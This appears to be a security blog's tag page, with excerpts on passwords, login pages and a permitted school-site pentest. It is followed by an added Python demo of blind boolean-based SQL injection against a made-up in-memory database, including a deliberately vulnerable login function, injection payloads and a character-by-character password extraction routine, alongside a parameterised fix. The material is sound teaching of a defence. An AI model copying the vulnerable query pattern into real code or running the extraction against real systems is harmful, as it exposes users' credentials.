Tag: Passwords

Bank-grade Security or Why Blocking Password Pasting is not a Good Security Strategy


Your friend creates a website. You are curious and you ask him: “is it secure?”, which, in your mind, probably means “did you secure your website to the best of your abilities?”, and your friend replies: “Yes, it has bank-grade security”. Oh, “bank-grade security”, damn! That means it’s very secure! Before you object, I am by no means stating that banking websites are insecure; I am interested in how banks and other financial institutions deal with passwords, though….


Your passwords are terrible, and it’s time to do something about it


You know what surprises me most about data breaches? It’s that people still use passwords like “password” or “123456” to protect their accounts. Think I’m kidding? I’m really not, take a look. Using passwords like these is a big issue because it leads to really, really bad things.

Identity theft

One day you log into your banking account to do some shopping and the next thing you see is that you’ve got no money. You’ve…


Creating a Secure Login Page


Login pages are everywhere: almost every website has one, from big companies to discussion forums. In this blog post I’ll explain how login pages work and show how to create one, but instead of spoon-feeding the details I will only explain the core concept. I will also clarify how to mitigate two types of attacks that a login feature exposes your website to. Let’s begin, shall we?

A login form – the basics…


How I could have pwned my highschool (SQLi, CSRF, Hardcoded Passwords & XSS) – Part 1


Introduction

It happened. Someone told me a website was invulnerable. Since it also happened to belong to a high school, I took it as a challenge, obtained permission to look for flaws in it, and found some pretty serious ones. The flaws have since been patched.

Blind, Boolean-Based SQL Injection

SQL Injection (SQLi) is a vulnerability that lets an attacker inject their own SQL into the statements an application builds from user input. With such a vulnerability, an attacker may be able to…
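The following is an added example, not code from the post above or from the high-school site it describes. It shows what "blind, boolean-based" means in practice: a login query that concatenates user input, the same query with bound parameters, and an extraction routine that recovers a secret one character at a time using nothing but the login's true/false answer. The `users` table, its rows and the plaintext password column are constructed for illustration (real systems store password hashes; plaintext is used here only so the oracle has something short to leak).

```python
"""
Blind, boolean-based SQL injection demonstrated against an in-memory
SQLite database. Added example; schema and rows are constructed.
"""
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    # Constructed sample data: two users, plaintext passwords (for the demo only).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "Tr0ub4dor&3"), ("student", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # DELIBERATELY VULNERABLE: user input is spliced into the SQL text, so a
    # single quote in the username ends the literal and the rest is parsed as SQL.
    sql = (
        f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Fixed version: bound parameters. The driver passes the values to SQLite
    # separately from the statement, so they are never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def blind_extract_password(conn: sqlite3.Connection, target_user: str,
                           login=vulnerable_login, max_len: int = 32) -> str:
    """Recover target_user's password using only the login's True/False result.

    Each probe asks one yes/no question: is character `pos` of the password
    equal to `c`? The predicate is appended to the username, and the trailing
    '--' comments out the rest of the original WHERE clause, including the
    password check, so the answer depends only on the injected condition.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for c in alphabet:
            lit = c.replace("'", "''")  # SQL string-literal quoting for the probe char
            payload = f"{target_user}' AND substr(password, {pos}, 1) = '{lit}' --"
            if login(conn, payload, "irrelevant"):
                found = c
                break
        if found is None:
            break  # no character matched: substr() returned '' -> end of the string
        recovered += found
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("bypass vs vulnerable:", vulnerable_login(db, "admin' --", "wrong"))
    print("bypass vs safe:      ", safe_login(db, "admin' --", "wrong"))
    print("blind extraction:    ", blind_extract_password(db, "admin"))
    print("vs parameterised:    ", repr(blind_extract_password(db, "admin", login=safe_login)))
```

Run against `safe_login`, the same extraction loop returns an empty string: the payload is compared as a username literal and never matches, which is the whole point of parameterised queries. Note also that `vulnerable_login` leaks nothing beyond a boolean; the extraction still succeeds, just slowly (at most one request per candidate character per position), which is why "blind" injection is no less serious than one that echoes query results.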
